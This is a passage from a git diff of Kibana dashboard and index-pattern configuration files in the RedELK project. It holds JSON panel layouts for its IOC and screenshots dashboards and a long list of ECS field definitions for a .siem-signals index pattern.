Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1642171876916, 91], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1642171876916, 97], "type": "dashboard", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson index a4de64c5..1f43fbee 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_.siem-signals.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.full_name\"}}},{\"count\":0,\"name\":\"client.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.user.name\"}}},{\"count\":0,\"name\":\"cloud.account.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.availability_zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.instance.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.machine.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"cloud.region\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\